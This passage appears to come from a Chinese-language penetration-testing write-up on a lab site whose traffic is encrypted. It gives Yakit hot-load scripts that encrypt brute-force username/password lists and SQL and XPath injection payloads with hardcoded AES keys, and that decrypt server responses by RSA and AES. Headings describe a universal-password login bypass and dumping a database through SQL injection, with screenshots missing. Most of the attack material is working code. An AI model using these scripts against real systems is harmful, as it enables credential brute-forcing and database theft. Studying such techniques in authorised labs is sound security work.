codec.DecodeBase64("L8A6ty9EwGl3itWZ++Gi0dqa1znNtMBYcHBu8mvEsFdxOKzB45czIL44mjr1kKR/eei2qpGJamv6KcKQT3wu+y5mZ2xFxgGo3ZD+hBQBR8uu7I2IjqEt7Av2Auhy59wModn8Y1MSebRSo8uLK3SSL7rKKd5Om48GU7AbQH6uyCp33L2zZsvdacHFHdR92nQsGEu4R4VOH9Zrxe9bCGUd10Yc/u1UsJ30D3y8WXu9kRqlA/XmyK1mk5M1ImNF0pd0vdq/DWtlb6+95Z9EH4biP1A7BD/8Dx2amZWfW8KqKJjBXIHONoVllnFhOkqjYQJsWS+qoDVQTVar9ChEw8k6Gw==")~)~//定义列表变量resullistresultlist = []//for循环嵌套username、password排列组合for uname in username {for passwd in password {//定义message：为加密前的参数格式message = {"username":uname,"password":passwd,"age":age}//dump为json格式传入ii = json.dumps(message)//结果=base64（AES-CGM-size12加密）=sign结果值reslut = codec.EncodeBase64(codec.AESGCMEncryptWithNonceSize12(key,i,iv)~)resultlist.Append(reslut)}}return resultlist
}mirrorHTTPFlow = func(req,rsp, packet) {// 获取私钥以解密响应数据pem = packet.privatekey// 切割响应中的数据，作为 JSON 加载,body = json.loads(poc.GetHTTPPacketBody(rsp))_, body = poc.Split(rsp)body = json.loads(body)//获取data、encryptedIV、encryptedKey密文//data = body.data//Key = body.encryptedKey//IV = body.encryptedIV//RSA解密key和ivKey = codec.RSADecryptWithOAEP(pem /*type: []byte*/, codec.DecodeBase64(body.encryptedKey)~)~IV = codec.RSADecryptWithOAEP(pem /*type: []byte*/, codec.DecodeBase64(body.encryptedIV)~)~//AES解密datadata = codec.AESGCMDecryptWithNonceSize12(Key, codec.DecodeBase64(body.data)~, IV)~return string(data)
}

爆破：

在这里插入图片描述

十二、SQL 注入（从登陆到 Dump 数据库）

在这里插入图片描述

AES-CBC加密

在这里插入图片描述

响应包解密：

在这里插入图片描述

请求包解密：

在这里插入图片描述

万能密码进入

在这里插入图片描述

搜索处sql注入

在这里插入图片描述

获取加密后的明文热加载（固定key、iv）

在这里插入图片描述

encryptData = func(p) {//key+iv加密aes-cbckey = codec.DecodeHex("30a4140dbd062ad0d49b13e94a855b88")~iv = codec.DecodeHex("25c493424f449f469e18228a71b3f20c")~//用户名、密码username = ["admin"]password = ["admin"]//定义resultlist列表，将加密后的内容存放列表中resultlist =[]//for嵌套for uname in username {for passwd in password {//定义加密内容格式message = {"username":uname,"password":passwd}//将message以json格式dumps下来i = json.dumps(message)//aes加密result = codec.EncodeBase64(codec.AESCBCEncrypt(key /*type: []byte*/, i, iv /*type: []byte*/)~)resultlist.Append(result)}}return resultlist
}
//解密响应包内容
decryptData = func(packet) {body = poc.GetHTTPPacketBody(packet /*type: []byte*/)jsonbody = json.loads(body)key = codec.DecodeHex(jsonbody.key)~iv = codec.DecodeHex(jsonbody.iv)~message = codec.DecodeBase64(jsonbody.message)~message = codec.AESCBCDecrypt(key /*type: []byte*/, message, iv /*type: []byte*/)~return poc.ReplaceBody(packet, message, false)
}afterRequest = func(rsp){return decryptData(rsp)
}

获取加前密后的明文热加载

在这里插入图片描述

//加密
encryptData = func(packet) {body = poc.GetHTTPPacketBody(packet)//随机数、或固定值都可以//key = codec.DecodeHex("30a4140dbd062ad0d49b13e94a855b88")~//iv = codec.DecodeHex("25c493424f449f469e18228a71b3f20c")~key = randstr(16)iv = randstr(12)//加密message内容result = codec.EncodeBase64(codec.AESCBCEncrypt(key, body, iv)~)// 十六进制加密key、iv//hexkey = ["30a4140dbd062ad0d49b13e94a855b88"]//hexiv = ["25c493424f449f469e18228a71b3f20c"]hexkey = codec.EncodeToHex(key)hexiv = codec.EncodeToHex(iv)// 输出body内容body = f`{"key": "${hexkey}","iv": "${hexiv}","message": "${result}"}`return poc.ReplaceBody(packet, body, false)
}
//解密响应包内容
decryptData = func(packet) {body = poc.GetHTTPPacketBody(packet /*type: []byte*/)//json格式转化对象传入jsonbodyjsonbody = json.loads(body)//调用key、iv、messagekey = codec.DecodeHex(jsonbody.key)~iv = codec.DecodeHex(jsonbody.iv)~//解密message内容message = codec.AESCBCDecrypt(key /*type: []byte*/, codec.DecodeBase64(jsonbody.message)~, iv /*type: []byte*/)~return poc.ReplaceBody(packet, message, false)
}
beforeRequest = func(req){return encryptData(req)
}afterRequest = func(rsp){return decryptData(rsp)
}

注入：

联合查询

在这里插入图片描述

热加载爆破

在这里插入图片描述

encryptData = func(p) {//key+iv加密aes-cbc//或随机数key、iv循环key = codec.DecodeHex("30a4140dbd062ad0d49b13e94a855b88")~iv = codec.DecodeHex("25c493424f449f469e18228a71b3f20c")~//用户名、密码search = x"{{x(xpath-injection)}}"//定义resultlist列表，将加密后的内容存放列表中resultlist =[]//for循环for sea in search {//定义加密内容格式message = {"search":sea}//将message以json格式dumps下来i = json.dumps(message)//aes加密result = codec.EncodeBase64(codec.AESCBCEncrypt(key /*type: []byte*/, i, iv /*type: []byte*/)~)resultlist.Append(result)}return resultlist
}
//解密响应包内容
decryptData = func(packet) {body = poc.GetHTTPPacketBody(packet /*type: []byte*/)jsonbody = json.loads(body)key = codec.DecodeHex(jsonbody.key)~iv = codec.DecodeHex(jsonbody.iv)~message = codec.DecodeBase64(jsonbody.message)~message = codec.AESCBCDecrypt(key /*type: []byte*/, message, iv /*type: []byte*/)~return poc.ReplaceBody(packet, message, false)
}afterRequest = func(rsp){return decryptData(rsp)
}